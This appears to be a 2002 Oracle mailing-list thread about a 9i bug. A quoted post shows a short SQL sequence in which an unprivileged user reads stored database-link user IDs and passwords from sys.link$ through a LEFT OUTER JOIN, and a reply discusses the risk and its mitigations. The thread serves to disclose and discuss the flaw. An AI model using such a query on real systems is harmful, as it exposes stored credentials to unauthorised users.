Re: 9iDB Security Hole?

Why ouch? This is known for database links for a long long time. It is not present there if you create the link in one of the manners that supports security.

And no one other than sys should be looking at sys.link$ anyway. If they are you have been granting SELECT ANY TABLE to people without regard to its implications. In 9i access, even with SELECT ANY TABLE goes away. And hopefully stays that way.

But if I had my preference, which I don't, Oracle would have encrypted it back at version 7.x or before. I would be interested in hearing from anyone inside of Oracle why this is there. Thanks.

Daniel Morgan

Jonathan Lewis wrote:

> Ouch - 9.0.1.3 on HP-UX
>
> connect / as sysdba
> CREATE USER us1 IDENTIFIED BY us11;
> Grant Create Session To us1;
>
> connect us1/us11
>
> select a.userid, a.password
> from sys.link$ a left outer join sys.link$ b on
> b.name= a.name
> ;
>
> userid password
> --------- --------------
> XXX **********
>
> --
> Jonathan Lewis
> http://www.jlcomp.demon.co.uk
>
> Author of:
> Practical Oracle 8i: Building Efficient Databases
>
> Next Seminar - Australia - July/August
> http://www.jlcomp.demon.co.uk/seminar.html
>
> Host to The Co-Operative Oracle Users' FAQ
> http://www.jlcomp.demon.co.uk/faq/ind_faq.html
>
> Vladimir M. Zakharychev wrote in message ...
> >Anyone with 9i can confirm this?
> >
> >
> >
> >This effectively means that LEFT OUTER JOIN allows to create views
> >on tables that are normally not visible (provided that unprivileged user
> >knows table and column names).
Received on Mon Apr 15 2002 - 18:15:13 CDT